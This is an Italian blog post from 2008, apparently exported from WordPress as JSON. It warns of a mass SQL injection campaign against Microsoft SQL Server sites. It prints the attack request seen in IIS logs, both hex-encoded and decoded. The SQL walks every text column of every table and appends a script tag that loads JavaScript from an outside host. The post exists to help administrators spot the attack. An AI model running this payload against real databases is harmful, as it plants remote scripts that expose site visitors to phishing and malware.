{"id":65,"date":"2008-08-12T22:38:00","date_gmt":"2008-08-12T20:38:00","guid":{"rendered":"http:\/\/www.fantascienza.com\/blog\/blackpig\/?p=65"},"modified":"2008-08-12T22:38:00","modified_gmt":"2008-08-12T20:38:00","slug":"attacchi-a-microsft-sql-server","status":"publish","type":"post","link":"https:\/\/luigirosa.com\/index.php\/2008\/08\/12\/attacchi-a-microsft-sql-server\/","title":{"rendered":"Attacchi a Microsft SQL Server"},"content":{"rendered":"

Trusted source riporta la notizia<\/a> di un nuovo attacco a Microsoft SQL Server.<\/p>\n

L’attacco sarebbe partito la scorsa settimana e avrebbe gi\u00e0 interessato migliaia di siti.<\/p>\n

Se spulciate i log del vostro IIS potreste trovare una riga di questo tipo:<\/p>\n

GET \/?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C41524520\n4054207661726368617228323535292C4043207661726368617228343030302920\n4445434C415245205461626C655F437572736F7220435552534F5220464F522073\n656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563\n747320612C737973636F6C756D6E73206220776865726520612E69643D622E6964\n20616E6420612E78747970653D27752720616E642028622E78747970653D393920\n6F7220622E78747970653D3335206F7220622E78747970653D323331206F722062\n2E78747970653D31363729204F50454E205461626C655F437572736F7220464554\n4348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040\n542C4043205748494C4528404046455443485F5354415455533D30292042454749\n4E20657865632827757064617465205B272B40542B275D20736574205B272B4043\n2B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C73637269707420\n7372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F77\n2E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27\n206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372\n633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A\n73223E3C2F7363726970743E3C212D2D272727294645544348204E455854204652\n4F4D20205461626C655F437572736F7220494E544F2040542C404320454E442043\n4C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C\n655F437572736F72%20AS%20CHAR(4000));EXEC(@S);HTTP\/1.1<\/pre>\n
Che altro non \u00e8 che la codifica esadecimale di questa procedura SQL (senza i link ai siti che ospitano gli script)<\/span>:<\/p>\n
DECLARE @T varchar(255),@C varchar(4000)\nDECLARE Table_Cursor CURSOR\nFOR select a.name,b.name from sysobjects a,syscolumns b\nwhere a.id=b.id and a.xtype='u' and\n(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)\nOPEN Table_Cursor\nFETCH NEXT FROM  Table_Cursor INTO @T,@C\nWHILE(@@FETCH_STATUS=0)\nBEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''\">\n<\/title><script src=\"http:\/\/sdo.1000mg.cn\/csrss\/w.js\"><\/script>\n<!--'' where '+@C+' not like ''%\"><\/title>\n<script src=\"http:\/\/sdo.1000mg.cn\/csrss\/w.js\"><\/script><!--''')\nFETCH NEXT FROM  Table_Cursor INTO @T,@C\nEND\nCLOSE Table_Cursor DEALLOCATE Table_Cursor<\/pre>\n
La sequenza SQL \u00e8 abbastanza offuscata e, comunque, non \u00e8 presente la parte di JavaScript che completa l’attacco<\/span> l’URL del JavaScript non \u00e8 pi\u00f9 raggiungibile. Lo scopo dell’attaccante \u00e8 di inserire nelle pagine visualizzate da un sito ritenuto affidabile del codice HTML che linka pagine di phishing o comunque di dubbia legalit\u00e0. L’efficacia dell’attacco \u00e8 aumentata dall’implicita fiducia che molti utenti hanno dei siti compromessi da questo attacco che stanno visitando.<\/p>\n
Microsfot SQL Server \u00e8 utilizzato da molte organizzazioni governative e da siti ritenuti affidabili dagli utenti; pertanto \u00e8 bene aumentare il livello di attenzione anche quando si visitano certi siti ritenuti affidabili.<\/p>\n
Un sistema per sapere senza fatica il tipo di server che state contattando \u00e8 l’estensione di Firefox<\/a> Server Spy<\/a>.<\/p>\n
In questo momento l’attacco \u00e8 ancora in atto e ci sono molti siti compromessi, quindi prestate attenzione.<\/p>\n","protected":false},"excerpt":{"rendered":"
Trusted source riporta la notizia di un nuovo attacco a Microsoft SQL Server. L’attacco sarebbe partito la scorsa settimana e avrebbe gi\u00e0 interessato migliaia di siti.<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"activitypub_content_warning":"","activitypub_content_visibility":"local","activitypub_max_image_attachments":3,"footnotes":""},"categories":[11,12,25],"tags":[82,259,265,308,320,423,431],"class_list":["post-65","post","type-post","status-publish","format-standard","hentry","category-informatica","category-internet-informatica","category-sicurezza","tag-attacco","tag-informatica","tag-internet-informatica","tag-microsoft","tag-mssql","tag-sicurezza","tag-sql"],"_links":{"self":[{"href":"https:\/\/luigirosa.com\/index.php\/wp-json\/wp\/v2\/posts\/65","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/luigirosa.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/luigirosa.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/luigirosa.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/luigirosa.com\/index.php\/wp-json\/wp\/v2\/comments?post=65"}],"version-history":[{"count":0,"href":"https:\/\/luigirosa.com\/index.php\/wp-json\/wp\/v2\/posts\/65\/revisions"}],"wp:attachment":[{"href":"https:\/\/luigirosa.com\/index.php\/wp-json\/wp\/v2\/media?parent=65"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/luigirosa.com\/index.php\/wp-json\/wp\/v2\/categories?post=65"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/luigirosa.com\/index.php\/wp-json\/wp\/v2\/tags?post=65"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}